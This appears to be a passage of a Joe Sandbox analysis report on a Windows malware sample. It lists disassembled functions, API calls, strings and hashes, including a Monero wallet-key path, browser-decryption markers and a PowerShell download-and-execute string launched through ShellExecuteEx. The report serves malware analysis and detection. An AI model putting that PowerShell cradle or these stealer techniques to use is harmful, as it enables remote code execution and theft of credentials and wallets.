                        • InternetOpenA.WININET(00F20DDF,00000000,00000000,00000000,00000000), ref: 00F04FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F05011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F05041
                        • InternetCloseHandle.WININET(?), ref: 00F050B9
                        • InternetCloseHandle.WININET(?), ref: 00F050C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 3b43f01d2caa602bc162db2c050849863e49dee225ad9488b2c6fa5af5c67d8b
                        • Instruction ID: b610cb0c1e475c02ef2a4f5ffbb2380de286db9643a41c229f3f3906fdf1bbb7
                        • Opcode Fuzzy Hash: 3b43f01d2caa602bc162db2c050849863e49dee225ad9488b2c6fa5af5c67d8b
                        • Instruction Fuzzy Hash: A4312AB5A40218ABDB24CF54DC85BDDB7B4EF48705F1081E8E60AA7284C7746AC59F98
                        Function 00F18100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008AEB10,00000000,?,00F20E2C,00000000,?,00000000), ref: 00F18130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F18158
                        • wsprintfA.USER32 ref: 00F181AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2922868504-3474575989
                        • Opcode ID: e8689726505c4cc7184b74f7e1249396682a01428f6e658c293769576728ec59
                        • Instruction ID: bb925274167e726a64d8d5833be2ad95c252675e34b372a4401ac8f7e2700599
                        • Opcode Fuzzy Hash: e8689726505c4cc7184b74f7e1249396682a01428f6e658c293769576728ec59
                        • Instruction Fuzzy Hash: 69218EB2E44218ABDB14DFD4DD49FAEB7B8FB44B00F104218F615BB280C77869418BA5
                        Function 00F183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F18426
                        • wsprintfA.USER32 ref: 00F18459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F1847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18499
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,008AEA50,00000000,000F003F,?,00000400), ref: 00F184EC
                        • lstrlen.KERNEL32(?), ref: 00F18501
                        • RegQueryValueExA.ADVAPI32(00000000,008AEB88,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F20B34), ref: 00F18599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 47d870f5ec0911b74a5d94a4752a711950e0398ee4c50df948bd1e32f714b57e
                        • Instruction ID: e20c47855d02833c9d86588ce1c47f3f968ad2d1964e2f83126731d2a2175da0
                        • Opcode Fuzzy Hash: 47d870f5ec0911b74a5d94a4752a711950e0398ee4c50df948bd1e32f714b57e
                        • Instruction Fuzzy Hash: FE210A759402189BDB24DB54DD85FE9B3B8FF48711F00C1A8A60A97180DF716AC6CFD4
                        Function 00F17690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F176A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F176AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0089C8A8,00000000,00020119,00000000), ref: 00F176DD
                        • RegQueryValueExA.ADVAPI32(00000000,008AEBB8,00000000,00000000,?,000000FF), ref: 00F176FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F17708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: cd2309ba5f7ac48822a5b0e8b609b217a5359b4912c90c0510ad8161fc010faf
                        • Instruction ID: 91bbdab40408effc7e75dcd58d8f73a1ecafc24d497f9dba79e52ed31caeea28
                        • Opcode Fuzzy Hash: cd2309ba5f7ac48822a5b0e8b609b217a5359b4912c90c0510ad8161fc010faf
                        • Instruction Fuzzy Hash: E20184B9A44304BBE714EBE0E849FAD77BCEF04B01F004064FA16D7285D67499809B50
                        Function 00F17720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F1773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0089C8A8,00000000,00020119,00F176B9), ref: 00F1775B
                        • RegQueryValueExA.ADVAPI32(00F176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F1777A
                        • RegCloseKey.ADVAPI32(00F176B9), ref: 00F17784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 7f2c895a1a16776dca72dd2718a7aff673366b29ad31e3770f7be37c1c3215b8
                        • Instruction ID: 091302e43244f147f5f913cc769d486a4bf96061eabce54f89faac1fdb4d3653
                        • Opcode Fuzzy Hash: 7f2c895a1a16776dca72dd2718a7aff673366b29ad31e3770f7be37c1c3215b8
                        • Instruction Fuzzy Hash: C60167B9A40309BBE714DBE0EC49FAEB7BCEF44B01F004164FA16A7285DA755540CF51
                        Function 00F099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                        • LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 9ab746f6d8571042a1775b976b3c3e856bafa284c91201f871745848e61e6234
                        • Instruction ID: ebd431bcb119139fc00a1b694d848d1b7c8eeb8543eea96de94c6021b2b8db28
                        • Opcode Fuzzy Hash: 9ab746f6d8571042a1775b976b3c3e856bafa284c91201f871745848e61e6234
                        • Instruction Fuzzy Hash: B3314D74E00209EFDB24CF94D885BAEB7B4FF48711F108158E912A72C0D779A981DFA0
                        Function 00F14780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,008AED50), ref: 00F147DB
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14801
                        • lstrcat.KERNEL32(?,?), ref: 00F14820
                        • lstrcat.KERNEL32(?,?), ref: 00F14834
                        • lstrcat.KERNEL32(?,0089C1D8), ref: 00F14847
                        • lstrcat.KERNEL32(?,?), ref: 00F1485B
                        • lstrcat.KERNEL32(?,008ADF38), ref: 00F1486F
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18D90: GetFileAttributesA.KERNEL32(00000000,?,00F01B54,?,?,00F2564C,?,?,00F20E1F), ref: 00F18D9F
                          • Part of subcall function 00F14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F14580
                          • Part of subcall function 00F14570: RtlAllocateHeap.NTDLL(00000000), ref: 00F14587
                          • Part of subcall function 00F14570: wsprintfA.USER32 ref: 00F145A6
                          • Part of subcall function 00F14570: FindFirstFileA.KERNEL32(?,?), ref: 00F145BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 25f0d44325d1d77c537af864cd17b0ea10e2842e2df507a9628a5cbef35af6a0
                        • Instruction ID: 49f17edea16aa003cd57ee892a074524c06dc607bc95c2f34917f562cbfb124c
                        • Opcode Fuzzy Hash: 25f0d44325d1d77c537af864cd17b0ea10e2842e2df507a9628a5cbef35af6a0
                        • Instruction Fuzzy Hash: D03193BAD4020857DB24F7B0DC85EE9737CAF48B00F404598B31696081EE7897C99B91
                        Function 00F12C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F12D85
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F12D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F12CC4
                        • <, xrefs: 00F12D39
                        • ')", xrefs: 00F12CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 33d69c62be5d97bcd8a43051a615279ba3224aa2fb97d9d3ad33caf3c51c062f
                        • Instruction ID: e0e4d31072517a70cda190959de5c2aaa7d23005fc3dffe8e9d81557cc71a030
                        • Opcode Fuzzy Hash: 33d69c62be5d97bcd8a43051a615279ba3224aa2fb97d9d3ad33caf3c51c062f
                        • Instruction Fuzzy Hash: A741DE71C112089ADB14EBA0DD91FDDB774AF10310F404119E016A71D2EF796ACBEF92
                        Function 00F09E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F09F41
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 5c93924b093974b69b6aef0ca31022de496de186af808701972a5ae76fe3898a
                        • Instruction ID: 317eb8245b85d95670afe6f7172e8864c285e8ba62c9f07008bee57a527e40fc
                        • Opcode Fuzzy Hash: 5c93924b093974b69b6aef0ca31022de496de186af808701972a5ae76fe3898a
                        • Instruction Fuzzy Hash: 94615C71A00248EBDB24EFA4DD96FED7775AF50310F008018F90A5F1C1EB786A46EB92
                        Function 00F140B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,008AE0B8,00000000,00020119,?), ref: 00F140F4
                        • RegQueryValueExA.ADVAPI32(?,008AECA8,00000000,00000000,00000000,000000FF), ref: 00F14118
                        • RegCloseKey.ADVAPI32(?), ref: 00F14122
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14147
                        • lstrcat.KERNEL32(?,008AED68), ref: 00F1415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
